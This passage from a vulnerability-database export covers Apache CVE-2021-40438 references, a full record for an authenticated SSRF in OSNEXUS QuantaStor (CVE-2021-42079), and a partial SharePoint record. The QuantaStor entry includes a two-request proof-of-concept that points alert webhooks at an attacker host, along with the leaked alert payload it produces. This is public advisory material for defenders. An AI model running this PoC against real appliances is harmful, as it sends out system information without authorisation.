"name": "[httpd-users] 20210923 Re: [users@httpd] 2.4.49 security fixes: more info",
"refsource": "MLIST",
"url": "https://lists.apache.org/thread.html/r82c077663f9759c7df5a6656f925b3ee4f55fcd33c889ba7cd687029@%3Cusers.httpd.apache.org%3E"
},
{
"name": "[httpd-users] 20210923 [users@httpd] Re: [External] : [users@httpd] 2.4.49 security fixes: more info",
"refsource": "MLIST",
"url": "https://lists.apache.org/thread.html/r3925e167d5eb1c75def3750c155d753064e1d34a143028bb32910432@%3Cusers.httpd.apache.org%3E"
},
{
"name": "[httpd-users] 20210923 Re: [users@httpd] Re: [External] : [users@httpd] 2.4.49 security fixes: more info",
"refsource": "MLIST",
"url": "https://lists.apache.org/thread.html/r61fdbfc26ab170f4e6492ef3bd5197c20b862ce156e9d5a54d4b899c@%3Cusers.httpd.apache.org%3E"
},
{
"name": "FEDORA-2021-e3f6dd670d",
"refsource": "FEDORA",
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZNCYSR3BXT36FFF4XTCPL3HDQK4VP45R/"
},
{
"name": "[debian-lts-announce] 20211002 [SECURITY] [DLA 2776-1] apache2 security update",
"refsource": "MLIST",
"url": "https://lists.debian.org/debian-lts-announce/2021/10/msg00001.html"
},
{
"name": "[httpd-bugs] 20211008 [Bug 65616] CVE-2021-36160 regression",
"refsource": "MLIST",
"url": "https://lists.apache.org/thread.html/r2eb200ac1340f69aa22af61ab34780c531d110437910cb9c0ece3b37@%3Cbugs.httpd.apache.org%3E"
},
{
"name": "DSA-4982",
"refsource": "DEBIAN",
"url": "https://www.debian.org/security/2021/dsa-4982"
},
{
"name": "[httpd-users] 20211019 [users@httpd] Regarding CVE-2021-40438",
"refsource": "MLIST",
"url": "https://lists.apache.org/thread.html/r210807d0bb55f4aa6fbe1512be6bcc4dacd64e84940429fba329967a@%3Cusers.httpd.apache.org%3E"
},
{
"name": "[httpd-users] 20211019 Re: [users@httpd] Regarding CVE-2021-40438",
"refsource": "MLIST",
"url": "https://lists.apache.org/thread.html/rf6954e60b1c8e480678ce3d02f61b8a788997785652e9557a3265c00@%3Cusers.httpd.apache.org%3E"
},
{
"name": "20211124 Multiple Vulnerabilities in Apache HTTP Server Affecting Cisco Products: November 2021",
"refsource": "CISCO",
"url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-httpd-2.4.49-VWL69sWQ"
},
{
"name": "https://www.oracle.com/security-alerts/cpujan2022.html",
"refsource": "MISC",
"url": "https://www.oracle.com/security-alerts/cpujan2022.html"
},
{
"name": "https://www.tenable.com/security/tns-2021-17",
"refsource": "CONFIRM",
"url": "https://www.tenable.com/security/tns-2021-17"
},
{
"name": "https://security.netapp.com/advisory/ntap-20211008-0004/",
"refsource": "CONFIRM",
"url": "https://security.netapp.com/advisory/ntap-20211008-0004/"
},
{
"name": "https://www.oracle.com/security-alerts/cpuapr2022.html",
"refsource": "MISC",
"url": "https://www.oracle.com/security-alerts/cpuapr2022.html"
},
{
"name": "https://cert-portal.siemens.com/productcert/pdf/ssa-685781.pdf",
"refsource": "CONFIRM",
"url": "https://cert-portal.siemens.com/productcert/pdf/ssa-685781.pdf"
},
{
"name": "GLSA-202208-20",
"refsource": "GENTOO",
"url": "https://security.gentoo.org/glsa/202208-20"
}
]
},
"source": {
"discovery": "UNKNOWN"
},
"timeline": [
{
"lang": "en",
"time": "2021-09-16T00:00:00",
"value": "2.4.49 released"
}
]
}
}
},
"cveMetadata": {
"assignerOrgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
"assignerShortName": "apache",
"cveId": "CVE-2021-40438",
"datePublished": "2021-09-16T14:40:23.000Z",
"dateReserved": "2021-09-02T00:00:00.000Z",
"dateUpdated": "2025-07-30T01:37:58.543Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2021-42079 (GCVE-0-2021-42079)
Vulnerability from cvelistv5
Published
2023-07-10 06:29
Modified
2025-09-22 06:40
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- CWE-918 - Server-Side Request Forgery (SSRF)
Summary
An authenticated administrator is able to prepare an alert that is able to execute an SSRF attack. This is exclusively with POST requests.
POC
Step 1: Prepare the SSRF with a request like this:
GET /qstorapi/alertConfigSet?senderEmailAddress=a&smtpServerIpAddress=BURPCOLLABHOST&smtpServerPort=25&smtpUsername=a&smtpPassword=1&smtpAuthType=1&customerSupportEmailAddress=1&poolFreeSpaceWarningThreshold=1&poolFreeSpaceAlertThreshold=1&poolFreeSpaceCriticalAlertThreshold=1&pagerDutyServiceKey=1&slackWebhookUrl=http://<target>&enableAlertTypes&enableAlertTypes=1&disableAlertTypes=1&pauseAlertTypes=1&mattermostWebhookUrl=http://<TARGET>
HTTP/1.1
Host: <HOSTNAME>
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Connection: close
authorization: Basic <BASIC_AUTH_HASH>
Content-Type: application/json
Content-Length: 0
Step 2: Trigger this alert with this request
GET /qstorapi/alertRaise?title=test&message=test&severity=1
HTTP/1.1
Host: <HOSTNAME>
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Connection: close
authorization: Basic <BASIC_AUTH_HASH>
Content-Type: application/json
Content-Length: 1
The post request received by <TARGET> looks like this:
{
### Python FLASK stuff ####
'endpoint': 'index',
'method': 'POST',
'cookies': ImmutableMultiDict([]),
### END Python FLASK stuff ####
'data': b'{
"attachments": [
{
"fallback": "[122] test / test.",
"color": "#aa2222",
"title": "[122] test",
"text": "test",
"fields": [
{
"title": "Alert Severity",
"value": "CRITICAL",
"short": false
}, {
"title": "Appliance",
"value": "quantastor (https://<HOSTNAME>)",
"short": true
}, {
"title": "System / Driver / Kernel Ver",
"value": "5.10.0.156+a25eaacef / scst-3.5.0-pre / 5.3.0-62-generic",
"short": false
}, {
"title": "System Startup",
"value": "Fri Aug 6 16-02-55 2021",
"short": true
}, {
"title": "SSID",
"value": "f4823762-1dd1-1333-47a0-6238c474a7e7",
"short": true
},
],
"footer": "QuantaStor Call-home Alert",
"footer_icon": " https://platform.slack-edge.com/img/default_application_icon.png ",
"ts": 1628461774
}
],
"mrkdwn":true
}',
#### FLASK REQUEST STUFF #####
'headers': {
'Host': '<redacted>',
'User-Agent': 'curl/7.58.0',
'Accept': '*/*',
'Content-Type': 'application/json',
'Content-Length': '790'
},
'args': ImmutableMultiDict([]),
'form': ImmutableMultiDict([]),
'remote_addr': '217.103.63.173',
'path': '/payload/58',
'whois_ip': 'TNF-AS, NL'
}
#### END FLASK REQUEST STUFF #####
References
| ▼ | URL | Tags |
|---|---|---|
| https://www.wbsec.nl/osnexus | third-party-advisory, technical-description | |
| https://cisrt.divd.nl/DIVD-2021-00020/ | third-party-advisory, exploit, technical-description | |
| https://www.osnexus.com/products/software-defined-storage | product | |
| https://csirt.divd.nl/CVE-2021-42079 | third-party-advisory |
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| OSNEXUS | QuantaStor |
Version: 0 ≤ |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-04T03:22:25.855Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"third-party-advisory",
"x_transferred"
],
"url": "https://www.wbsec.nl/osnexus"
},
{
"tags": [
"third-party-advisory",
"x_transferred"
],
"url": "https://www.divd.nl/DIVD-2021-00020"
},
{
"tags": [
"product",
"x_transferred"
],
"url": "https://www.osnexus.com/products/software-defined-storage"
},
{
"tags": [
"third-party-advisory",
"x_transferred"
],
"url": "https://csirt.divd.nl/CVE-2021-42079"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2021-42079",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-11-04T20:06:08.530050Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-11-04T20:06:17.817Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"collectionURL": "https://www.osnexus.com/downloads",
"defaultStatus": "unknown",
"platforms": [
"Windows",
"Linux"
],
"product": "QuantaStor",
"vendor": "OSNEXUS",
"versions": [
{
"lessThan": "6.0.0.355",
"status": "affected",
"version": "0",
"versionType": "semver"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"value": "Wietse Boonstra (DIVD)"
},
{
"lang": "en",
"type": "analyst",
"value": "Frank Breedijk (DIVD)"
},
{
"lang": "en",
"type": "analyst",
"value": "Victor Pasman (DIVD)"
},
{
"lang": "en",
"type": "analyst",
"value": "Victor Gevers (DIVD)"
},
{
"lang": "en",
"type": "analyst",
"value": "Max van der Horst (DIVD)"
},
{
"lang": "en",
"type": "analyst",
"value": "C\u00e9listine Oosting (DIVD)"
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "An authenticated administrator is able to prepare an alert that is able to execute an SSRF attack. This is exclusively with POST requests.\u003cbr\u003e\u003cbr\u003ePOC\u003cbr\u003e\u003cbr\u003eStep 1: Prepare the SSRF with a request like this:\u003cbr\u003e\u003cbr\u003e\u003ctt\u003e\u003cspan style=\"background-color: rgba(29, 28, 29, 0.04);\"\u003eGET /qstorapi/alertConfigSet?senderEmailAddress=a\u0026amp;smtpServerIpAddress=BURPCOLLABHOST\u0026amp;smtpServerPort=25\u0026amp;smtpUsername=a\u0026amp;smtpPassword=1\u0026amp;smtpAuthType=1\u0026amp;customerSupportEmailAddress=1\u0026amp;poolFreeSpaceWarningThreshold=1\u0026amp;poolFreeSpaceAlertThreshold=1\u0026amp;poolFreeSpaceCriticalAlertThreshold=1\u0026amp;pagerDutyServiceKey=1\u0026amp;slackWebhookUrl=\u003c/span\u003ehttp://\u0026lt;target\u0026gt;\u003cspan style=\"background-color: rgba(29, 28, 29, 0.04);\"\u003e\u0026amp;enableAlertTypes\u0026amp;enableAlertTypes=1\u0026amp;disableAlertTypes=1\u0026amp;pauseAlertTypes=1\u0026amp;mattermostWebhookUrl=\u003c/span\u003ehttp://\u0026lt;TARGET\u0026gt;\u003cbr\u003e\u003cspan style=\"background-color: rgba(29, 28, 29, 0.04);\"\u003eHTTP/1.1\n\u003cbr\u003eHost: \u0026lt;HOSTNAME\u0026gt; \u003cbr\u003eAccept-Encoding: gzip, deflate\n\u003cbr\u003eAccept: */*\nAccept-Language: en\n\u003cbr\u003eUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36\u003cbr\u003e\nConnection: close\n\u003cbr\u003eauthorization: Basic \u0026lt;BASIC_AUTH_HASH\u0026gt; \u003cbr\u003eContent-Type: application/json\n\u003cbr\u003eContent-Length: 0\u003c/span\u003e\u003c/tt\u003e\u003cbr\u003e\u003ctt\u003e\u003cbr\u003eStep 2: Trigger this alert with this request\u003cbr\u003e\u003cbr\u003e\u003cspan style=\"background-color: rgba(29, 28, 29, 0.04);\"\u003eGET /qstorapi/alertRaise?title=test\u0026amp;message=test\u0026amp;severity=1 \u003cbr\u003eHTTP/1.1\n\u003cbr\u003eHost: \u0026lt;HOSTNAME\u0026gt; \u003cbr\u003eAccept-Encoding: gzip, deflate\n\u003cbr\u003eAccept: */*\n\u003cbr\u003eAccept-Language: en\n\u003cbr\u003eUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36\n\u003cbr\u003eConnection: close\n\u003cbr\u003eauthorization: Basic \u0026lt;BASIC_AUTH_HASH\u0026gt; \u003cbr\u003eContent-Type: application/json\n\u003cbr\u003eContent-Length: 1\u003cbr\u003e\u003cbr\u003e\u003c/span\u003e\u003c/tt\u003eThe post request received by \u0026lt;TARGET\u0026gt; looks like this:\u003cbr\u003e\u003cspan style=\"background-color: rgba(29, 28, 29, 0.04);\"\u003e{\u003cbr\u003e\u2003\n### Python FLASK stuff ####\n\u003cbr\u003e\u2003\u0027endpoint\u0027: \u0027index\u0027, \u003cbr\u003e\u2003\n\u0027method\u0027: \u0027POST\u0027, \u003cbr\u003e\u2003\n\u0027cookies\u0027: ImmutableMultiDict([]), \u003cbr\u003e\u2003\n### END Python FLASK stuff ####\n\u003cbr\u003e\u2003\n\u0027data\u0027: b\u0027{ \u003cbr\u003e\u2003\u2003\"attachments\": [ \u003cbr\u003e\u2003\u2003\u2003{\n\u003cbr\u003e\u2003\u2003\u2003\u2003\"fallback\": \"[122] test / test.\",\n\u003cbr\u003e\u2003\u2003\u2003\u2003\"color\": \"#aa2222\",\n\u003cbr\u003e\u2003\u2003\u2003\u2003\"title\": \"[122] test\",\n\u003cbr\u003e\u2003\u2003\u2003\u2003\"text\": \"test\",\n\u003cbr\u003e\u2003\u2003\u2003\u2003\"fields\": [ \u0026nbsp; \u003cbr\u003e\u2003\u2003\u2003\u2003\u2003{ \u0026nbsp; \u0026nbsp;\n\u003cbr\u003e\u2003\u2003\u2003\u2003\u2003\u2003\"title\": \"Alert Severity\",\n \u0026nbsp; \u0026nbsp;\u003cbr\u003e\u2003\u2003\u2003\u2003\u2003\u2003\"value\": \"CRITICAL\",\n \u0026nbsp; \u0026nbsp;\u003cbr\u003e\u2003\u2003\u2003\u2003\u2003\u2003\"short\": false \u0026nbsp;\u003cbr\u003e\u2003\u2003\u2003\u2003\u2003}, \u0026nbsp;{ \u0026nbsp; \u003cbr\u003e\u2003\u2003\u2003\u2003\u2003\u2003\"title\": \"Appliance\", \u0026nbsp; \u0026nbsp; \u003cbr\u003e\u2003\u2003\u2003\u2003\u2003\u2003\"value\": \"quantastor (\u003c/span\u003ehttps://\u0026lt;HOSTNAME\u0026gt;\u003cspan style=\"background-color: rgba(29, 28, 29, 0.04);\"\u003e)\",\n \u0026nbsp; \u0026nbsp; \u003cbr\u003e\u2003\u2003\u2003\u2003\u2003\u2003\"short\": true \u0026nbsp;\n\u003cbr\u003e\u2003\u2003\u2003\u2003\u2003}, \u0026nbsp;{ \u0026nbsp; \u0026nbsp;\n\u003cbr\u003e\u2003\u2003\u2003\u2003\u2003\u2003\"title\": \"System / Driver / Kernel Ver\", \u0026nbsp; \u0026nbsp;\n\u003cbr\u003e\u2003\u2003\u2003\u2003\u2003\u2003\"value\": \"5.10.0.156+a25eaacef / scst-3.5.0-pre / 5.3.0-62-generic\", \u0026nbsp; \u0026nbsp;\n\u003cbr\u003e\u2003\u2003\u2003\u2003\u2003\u2003\"short\": false \u0026nbsp;\n\u003cbr\u003e\u2003\u2003\u2003\u2003\u2003}, \u0026nbsp;{ \u0026nbsp; \u0026nbsp;\n\u003cbr\u003e\u2003\u2003\u2003\u2003\u2003\u2003\"title\": \"System Startup\", \u0026nbsp; \u0026nbsp;\n\u003cbr\u003e\u2003\u2003\u2003\u2003\u2003\u2003\"value\": \"Fri Aug \u0026nbsp;6 16-02-55 2021\", \u0026nbsp; \u0026nbsp;\n\u003cbr\u003e\u2003\u2003\u2003\u2003\u2003\u2003\"short\": true \u0026nbsp;\n\u003cbr\u003e\u2003\u2003\u2003\u2003\u2003 }, \u0026nbsp;{ \u0026nbsp; \u0026nbsp;\n\u003cbr\u003e\u2003\u2003\u2003\u2003\u2003\u2003\"title\": \"SSID\", \u0026nbsp; \u0026nbsp;\n\u003cbr\u003e\u2003\u2003\u2003\u2003\u2003\u2003\"value\": \"f4823762-1dd1-1333-47a0-6238c474a7e7\", \u0026nbsp; \u0026nbsp;\n\u003cbr\u003e\u2003\u2003\u2003\u2003\u2003\u2003\"short\": true \u0026nbsp;\n\u003cbr\u003e\u2003\u2003\u2003\u2003\u2003},\u003cbr\u003e\u2003\u2003\u2003\u2003],\n\u003cbr\u003e\u2003\u2003\u2003\u2003\"footer\": \"QuantaStor Call-home Alert\",\n\u003cbr\u003e\u2003\u2003\u2003\u2003\"footer_icon\": \"\u003c/span\u003e\u003ca target=\"_blank\" rel=\"nofollow\" href=\"https://platform.slack-edge.com/img/default_application_icon.png\"\u003ehttps://platform.slack-edge.com/img/default_application_icon.png\u003c/a\u003e\u003cspan style=\"background-color: rgba(29, 28, 29, 0.04);\"\u003e\",\n\u003cbr\u003e\u2003\u2003\u2003\u2003\"ts\": 1628461774\u003cbr\u003e\u2003\u2003\u2003}\u003cbr\u003e\u2003\u2003], \u003cbr\u003e\u2003\u2003\"mrkdwn\":true \u003cbr\u003e\u2003}\u0027, \u003cbr\u003e\u2003#### FLASK REQUEST STUFF #####\n\u003cbr\u003e\u2003\u0027headers\u0027: {\n\u003cbr\u003e\u2003\u2003\u0027Host\u0027: \u0027\u0026lt;redacted\u0026gt;\u0027, \u003cbr\u003e\u2003\u2003\u0027User-Agent\u0027: \u0027curl/7.58.0\u0027, \u003cbr\u003e\u2003\u2003\u0027Accept\u0027: \u0027*/*\u0027, \u003cbr\u003e\u2003\u2003\u0027Content-Type\u0027: \u0027application/json\u0027, \u003cbr\u003e\u2003\u2003\u0027Content-Length\u0027: \u0027790\u0027\n\u003cbr\u003e\u2003}, \u003cbr\u003e\u2003\u0027args\u0027: ImmutableMultiDict([]), \u003cbr\u003e\u2003\u0027form\u0027: ImmutableMultiDict([]), \u003cbr\u003e\u2003\u0027remote_addr\u0027: \u0027217.103.63.173\u0027, \u003cbr\u003e\u2003\u0027path\u0027: \u0027/payload/58\u0027, \u003cbr\u003e\u2003\u0027whois_ip\u0027: \u0027TNF-AS, NL\u0027\u003cbr\u003e}\n\u003cbr\u003e#### END FLASK REQUEST STUFF #####\u003c/span\u003e\u003ctt\u003e\u003c/tt\u003e"
}
],
"value": "An authenticated administrator is able to prepare an alert that is able to execute an SSRF attack. This is exclusively with POST requests.\n\nPOC\n\nStep 1: Prepare the SSRF with a request like this:\n\nGET /qstorapi/alertConfigSet?senderEmailAddress=a\u0026smtpServerIpAddress=BURPCOLLABHOST\u0026smtpServerPort=25\u0026smtpUsername=a\u0026smtpPassword=1\u0026smtpAuthType=1\u0026customerSupportEmailAddress=1\u0026poolFreeSpaceWarningThreshold=1\u0026poolFreeSpaceAlertThreshold=1\u0026poolFreeSpaceCriticalAlertThreshold=1\u0026pagerDutyServiceKey=1\u0026slackWebhookUrl=http://\u003ctarget\u003e\u0026enableAlertTypes\u0026enableAlertTypes=1\u0026disableAlertTypes=1\u0026pauseAlertTypes=1\u0026mattermostWebhookUrl=http://\u003cTARGET\u003e\nHTTP/1.1\n\nHost: \u003cHOSTNAME\u003e \nAccept-Encoding: gzip, deflate\n\nAccept: */*\nAccept-Language: en\n\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36\n\nConnection: close\n\nauthorization: Basic \u003cBASIC_AUTH_HASH\u003e \nContent-Type: application/json\n\nContent-Length: 0\n\nStep 2: Trigger this alert with this request\n\nGET /qstorapi/alertRaise?title=test\u0026message=test\u0026severity=1 \nHTTP/1.1\n\nHost: \u003cHOSTNAME\u003e \nAccept-Encoding: gzip, deflate\n\nAccept: */*\n\nAccept-Language: en\n\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36\n\nConnection: close\n\nauthorization: Basic \u003cBASIC_AUTH_HASH\u003e \nContent-Type: application/json\n\nContent-Length: 1\n\nThe post request received by \u003cTARGET\u003e looks like this:\n{\n\u2003\n### Python FLASK stuff ####\n\n\u2003\u0027endpoint\u0027: \u0027index\u0027, \n\u2003\n\u0027method\u0027: \u0027POST\u0027, \n\u2003\n\u0027cookies\u0027: ImmutableMultiDict([]), \n\u2003\n### END Python FLASK stuff ####\n\n\u2003\n\u0027data\u0027: b\u0027{ \n\u2003\u2003\"attachments\": [ \n\u2003\u2003\u2003{\n\n\u2003\u2003\u2003\u2003\"fallback\": \"[122] test / test.\",\n\n\u2003\u2003\u2003\u2003\"color\": \"#aa2222\",\n\n\u2003\u2003\u2003\u2003\"title\": \"[122] test\",\n\n\u2003\u2003\u2003\u2003\"text\": \"test\",\n\n\u2003\u2003\u2003\u2003\"fields\": [ \u00a0 \n\u2003\u2003\u2003\u2003\u2003{ \u00a0 \u00a0\n\n\u2003\u2003\u2003\u2003\u2003\u2003\"title\": \"Alert Severity\",\n \u00a0 \u00a0\n\u2003\u2003\u2003\u2003\u2003\u2003\"value\": \"CRITICAL\",\n \u00a0 \u00a0\n\u2003\u2003\u2003\u2003\u2003\u2003\"short\": false \u00a0\n\u2003\u2003\u2003\u2003\u2003}, \u00a0{ \u00a0 \n\u2003\u2003\u2003\u2003\u2003\u2003\"title\": \"Appliance\", \u00a0 \u00a0 \n\u2003\u2003\u2003\u2003\u2003\u2003\"value\": \"quantastor (https://\u003cHOSTNAME\u003e)\",\n \u00a0 \u00a0 \n\u2003\u2003\u2003\u2003\u2003\u2003\"short\": true \u00a0\n\n\u2003\u2003\u2003\u2003\u2003}, \u00a0{ \u00a0 \u00a0\n\n\u2003\u2003\u2003\u2003\u2003\u2003\"title\": \"System / Driver / Kernel Ver\", \u00a0 \u00a0\n\n\u2003\u2003\u2003\u2003\u2003\u2003\"value\": \"5.10.0.156+a25eaacef / scst-3.5.0-pre / 5.3.0-62-generic\", \u00a0 \u00a0\n\n\u2003\u2003\u2003\u2003\u2003\u2003\"short\": false \u00a0\n\n\u2003\u2003\u2003\u2003\u2003}, \u00a0{ \u00a0 \u00a0\n\n\u2003\u2003\u2003\u2003\u2003\u2003\"title\": \"System Startup\", \u00a0 \u00a0\n\n\u2003\u2003\u2003\u2003\u2003\u2003\"value\": \"Fri Aug \u00a06 16-02-55 2021\", \u00a0 \u00a0\n\n\u2003\u2003\u2003\u2003\u2003\u2003\"short\": true \u00a0\n\n\u2003\u2003\u2003\u2003\u2003 }, \u00a0{ \u00a0 \u00a0\n\n\u2003\u2003\u2003\u2003\u2003\u2003\"title\": \"SSID\", \u00a0 \u00a0\n\n\u2003\u2003\u2003\u2003\u2003\u2003\"value\": \"f4823762-1dd1-1333-47a0-6238c474a7e7\", \u00a0 \u00a0\n\n\u2003\u2003\u2003\u2003\u2003\u2003\"short\": true \u00a0\n\n\u2003\u2003\u2003\u2003\u2003},\n\u2003\u2003\u2003\u2003],\n\n\u2003\u2003\u2003\u2003\"footer\": \"QuantaStor Call-home Alert\",\n\n\u2003\u2003\u2003\u2003\"footer_icon\": \" https://platform.slack-edge.com/img/default_application_icon.png \",\n\n\u2003\u2003\u2003\u2003\"ts\": 1628461774\n\u2003\u2003\u2003}\n\u2003\u2003], \n\u2003\u2003\"mrkdwn\":true \n\u2003}\u0027, \n\u2003#### FLASK REQUEST STUFF #####\n\n\u2003\u0027headers\u0027: {\n\n\u2003\u2003\u0027Host\u0027: \u0027\u003credacted\u003e\u0027, \n\u2003\u2003\u0027User-Agent\u0027: \u0027curl/7.58.0\u0027, \n\u2003\u2003\u0027Accept\u0027: \u0027*/*\u0027, \n\u2003\u2003\u0027Content-Type\u0027: \u0027application/json\u0027, \n\u2003\u2003\u0027Content-Length\u0027: \u0027790\u0027\n\n\u2003}, \n\u2003\u0027args\u0027: ImmutableMultiDict([]), \n\u2003\u0027form\u0027: ImmutableMultiDict([]), \n\u2003\u0027remote_addr\u0027: \u0027217.103.63.173\u0027, \n\u2003\u0027path\u0027: \u0027/payload/58\u0027, \n\u2003\u0027whois_ip\u0027: \u0027TNF-AS, NL\u0027\n}\n\n#### END FLASK REQUEST STUFF #####"
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.2,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "HIGH",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:N/A:N",
"version": "3.1"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-918",
"description": "CWE-918 Server-Side Request Forgery (SSRF)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-09-22T06:40:03.059Z",
"orgId": "b87402ff-ae37-4194-9dae-31abdbd6f217",
"shortName": "DIVD"
},
"references": [
{
"tags": [
"third-party-advisory",
"technical-description"
],
"url": "https://www.wbsec.nl/osnexus"
},
{
"tags": [
"third-party-advisory",
"exploit",
"technical-description"
],
"url": "https://cisrt.divd.nl/DIVD-2021-00020/"
},
{
"tags": [
"product"
],
"url": "https://www.osnexus.com/products/software-defined-storage"
},
{
"tags": [
"third-party-advisory"
],
"url": "https://csirt.divd.nl/CVE-2021-42079"
}
],
"solutions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "Upgrade to the latest version of OSNEXUS QuantaStor."
}
],
"value": "Upgrade to the latest version of OSNEXUS QuantaStor."
}
],
"source": {
"discovery": "INTERNAL"
},
"title": "SSRF vulnerability in OSNEXUS QuantaStor before 6.0.0.355",
"x_generator": {
"engine": "Vulnogram 0.1.0-dev"
}
}
},
"cveMetadata": {
"assignerOrgId": "b87402ff-ae37-4194-9dae-31abdbd6f217",
"assignerShortName": "DIVD",
"cveId": "CVE-2021-42079",
"datePublished": "2023-07-10T06:29:48.339Z",
"dateReserved": "2021-10-07T17:12:57.677Z",
"dateUpdated": "2025-09-22T06:40:03.059Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-24954 (GCVE-0-2023-24954)
Vulnerability from cvelistv5
Published
2023-05-09 17:03
Modified
2025-07-10 16:38
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- CWE-918 - Server-Side Request Forgery (SSRF)
Summary
Microsoft SharePoint Server Information Disclosure Vulnerability
References
| ▼ | URL | Tags |
|---|---|---|
| https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-24954 | vendor-advisory |
Impacted products
| Vendor | Product | Version | ||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| ▼ | Microsoft | Microsoft SharePoint Enterprise Server 2016 |
Version: 16.0.0 < 16.0.5395.1000 |
|||||||||||
|
||||||||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T11:11:43.452Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "Microsoft SharePoint Server Information Disclosure Vulnerability",
"tags": [
"vendor-advisory",
"x_transferred"
],
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-24954"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-24954",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-02-28T19:25:00.889006Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-02-28T20:02:48.648Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"platforms": [
"x64-based Systems"
],
"product": "Microsoft SharePoint Enterprise Server 2016",
"vendor": "Microsoft",
"versions": [
{
"lessThan": "16.0.5395.1000",
"status": "affected",
"version": "16.0.0",
"versionType": "custom"
}
]
},
{
"platforms": [
"x64-based Systems"
],
"product": "Microsoft SharePoint Server 2019",
"vendor": "Microsoft",
"versions": [
{
"lessThan": "16.0.10398.20000",
"status": "affected",
"version": "16.0.0",
"versionType": "custom"
}
]
},
{
"platforms": [
"x64-based Systems"
],
"product": "Microsoft SharePoint Server Subscription Edition",
"vendor": "Microsoft",
"versions": [
{
"lessThan": "16.0.16130.20420",
"status": "affected",
"version": "16.0.0",
"versionType": "custom"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:microsoft:sharepoint_server:*:*:*:*:enterprise:*:*:*",
"versionEndExcluding": "16.0.5395.1000",
"versionStartIncluding": "16.0.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:sharepoint_server:*:*:*:*:*:*:*:*",
"versionEndExcluding": "16.0.10398.20000",
"versionStartIncluding": "16.0.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:sharepoint_server:*:*:*:*:subscription:*:*:*",
"versionEndExcluding": "16.0.16130.20420",
"versionStartIncluding": "16.0.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"datePublic": "2023-05-09T07:00:00.000Z",
"descriptions": [
{
"lang": "en-US",
"value": "Microsoft SharePoint Server Information Disclosure Vulnerability"
}
],
"metrics": [
{
"cvssV3_1": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N/E:U/RL:O/RC:C",
